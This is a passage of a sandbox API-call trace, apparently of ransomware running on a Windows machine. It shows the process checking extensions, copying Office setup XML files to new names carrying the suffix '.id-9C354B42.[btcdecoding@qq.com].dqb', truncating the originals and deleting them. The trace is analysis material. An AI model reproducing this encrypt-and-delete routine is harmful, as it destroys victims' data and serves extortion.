[0039.028] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString=".bz2") returned 4 [0039.028] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString=".7z") returned 3 [0039.028] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.028] lstrlenW (lpString=".dbf") returned 4 [0039.028] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.028] lstrlenW (lpString=".1cd") returned 4 [0039.028] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.028] lstrlenW (lpString=".jpg") returned 4 [0039.028] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.028] lstrlenW (lpString=".doc") returned 4 [0039.028] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString=".docx") returned 5 [0039.028] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.028] lstrlenW (lpString=".pdf") returned 4 [0039.028] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString=".xls") returned 4 [0039.028] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString=".xlsx") returned 5 [0039.028] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.028] lstrlenW (lpString=".ppt") returned 4 [0039.028] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.028] lstrlenW (lpString=".zip") returned 4 [0039.028] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.028] lstrlenW (lpString=".rar") returned 4 [0039.028] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.029] lstrlenW (lpString=".bz2") returned 4 [0039.029] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.029] lstrlenW (lpString=".7z") returned 3 [0039.029] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.029] lstrlenW (lpString=".dbf") returned 4 [0039.029] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.029] lstrlenW (lpString=".1cd") returned 4 [0039.029] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.029] lstrlenW (lpString=".jpg") returned 4 [0039.029] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.029] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.029] lstrlenW (lpString="OutlookMUI.XML") returned 14 [0039.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0039.029] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=3186) returned 1 [0039.029] CloseHandle (hObject=0x180) returned 1 [0039.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 0x20 [0039.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0039.030] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.030] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0039.031] GetLastError () returned 0x0 [0039.031] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xc72, lpOverlapped=0x0) returned 1 [0039.333] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xc80, lpOverlapped=0x0) returned 1 [0039.334] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0039.334] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf0, lpOverlapped=0x0) returned 1 [0039.334] SetEndOfFile (hFile=0x1d8) returned 1 [0039.334] CloseHandle (hObject=0x1d8) returned 1 [0039.335] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.335] SetEndOfFile (hFile=0x180) returned 1 [0039.336] CloseHandle (hObject=0x180) returned 1 [0039.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.336] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1 [0039.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.336] lstrlenW (lpString=".doc") returned 4 [0039.336] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.336] lstrlenW (lpString=".docx") returned 5 [0039.336] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.336] lstrlenW (lpString=".pdf") returned 4 [0039.336] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.336] lstrlenW (lpString=".xls") returned 4 [0039.336] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.336] lstrlenW (lpString=".xlsx") returned 5 [0039.337] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.337] lstrlenW (lpString=".ppt") returned 4 [0039.337] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.337] lstrlenW (lpString=".zip") returned 4 [0039.337] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.337] lstrlenW (lpString=".rar") returned 4 [0039.337] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString=".bz2") returned 4 [0039.337] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString=".7z") returned 3 [0039.337] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.337] lstrlenW (lpString=".dbf") returned 4 [0039.337] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.337] lstrlenW (lpString=".1cd") returned 4 [0039.337] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.337] lstrlenW (lpString=".jpg") returned 4 [0039.337] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.337] lstrlenW (lpString=".doc") returned 4 [0039.337] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString=".docx") returned 5 [0039.337] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.337] lstrlenW (lpString=".pdf") returned 4 [0039.337] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString=".xls") returned 4 [0039.337] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.337] lstrlenW (lpString=".xlsx") returned 5 [0039.337] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.338] lstrlenW (lpString=".ppt") returned 4 [0039.338] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.338] lstrlenW (lpString=".zip") returned 4 [0039.338] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.338] lstrlenW (lpString=".rar") returned 4 [0039.338] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.338] lstrlenW (lpString=".bz2") returned 4 [0039.338] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.338] lstrlenW (lpString=".7z") returned 3 [0039.338] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.338] lstrlenW (lpString=".dbf") returned 4 [0039.338] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.338] lstrlenW (lpString=".1cd") returned 4 [0039.338] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0039.338] lstrlenW (lpString=".jpg") returned 4 [0039.338] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.338] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.338] lstrlenW (lpString="ProjectMUI.XML") returned 14 [0039.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0039.338] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1452) returned 1 [0039.338] CloseHandle (hObject=0x180) returned 1 [0039.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 0x20 [0039.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0039.339] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.339] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0039.832] GetLastError () returned 0x0 [0039.832] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5ac, lpOverlapped=0x0) returned 1 [0039.938] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.005] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.005] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.005] SetEndOfFile (hFile=0x204) returned 1 [0040.005] CloseHandle (hObject=0x204) returned 1 [0040.006] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.006] SetEndOfFile (hFile=0x180) returned 1 [0040.007] CloseHandle (hObject=0x180) returned 1 [0040.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.007] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1 [0040.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.007] lstrlenW (lpString=".doc") returned 4 [0040.007] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.007] lstrlenW (lpString=".docx") returned 5 [0040.007] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.008] lstrlenW (lpString=".pdf") returned 4 [0040.008] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString=".xls") returned 4 [0040.008] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString=".xlsx") returned 5 [0040.008] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.008] lstrlenW (lpString=".ppt") returned 4 [0040.008] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.008] lstrlenW (lpString=".zip") returned 4 [0040.008] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.008] lstrlenW (lpString=".rar") returned 4 [0040.008] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString=".bz2") returned 4 [0040.008] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString=".7z") returned 3 [0040.008] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.008] lstrlenW (lpString=".dbf") returned 4 [0040.008] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.008] lstrlenW (lpString=".1cd") returned 4 [0040.008] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.008] lstrlenW (lpString=".jpg") returned 4 [0040.008] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.008] lstrlenW (lpString=".doc") returned 4 [0040.008] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString=".docx") returned 5 [0040.008] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.008] lstrlenW (lpString=".pdf") returned 4 [0040.008] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.008] lstrlenW (lpString=".xls") returned 4 [0040.009] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.009] lstrlenW (lpString=".xlsx") returned 5 [0040.009] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.009] lstrlenW (lpString=".ppt") returned 4 [0040.009] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.009] lstrlenW (lpString=".zip") returned 4 [0040.009] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.009] lstrlenW (lpString=".rar") returned 4 [0040.009] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.009] lstrlenW (lpString=".bz2") returned 4 [0040.009] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.009] lstrlenW (lpString=".7z") returned 3 [0040.009] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.009] lstrlenW (lpString=".dbf") returned 4 [0040.009] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.009] lstrlenW (lpString=".1cd") returned 4 [0040.009] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.009] lstrlenW (lpString=".jpg") returned 4 [0040.009] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.009] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.009] lstrlenW (lpString="ProPlusrWW.XML") returned 14 [0040.009] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.010] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=16852) returned 1 [0040.010] CloseHandle (hObject=0x180) returned 1 [0040.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 0x20 [0040.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.010] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.011] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.011] GetLastError () returned 0x0 [0040.011] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x41d4, lpOverlapped=0x0) returned 1 [0040.013] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0040.014] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.014] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.014] SetEndOfFile (hFile=0x204) returned 1 [0040.014] CloseHandle (hObject=0x204) returned 1 [0040.015] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.015] SetEndOfFile (hFile=0x180) returned 1 [0040.016] CloseHandle (hObject=0x180) returned 1 [0040.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.016] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 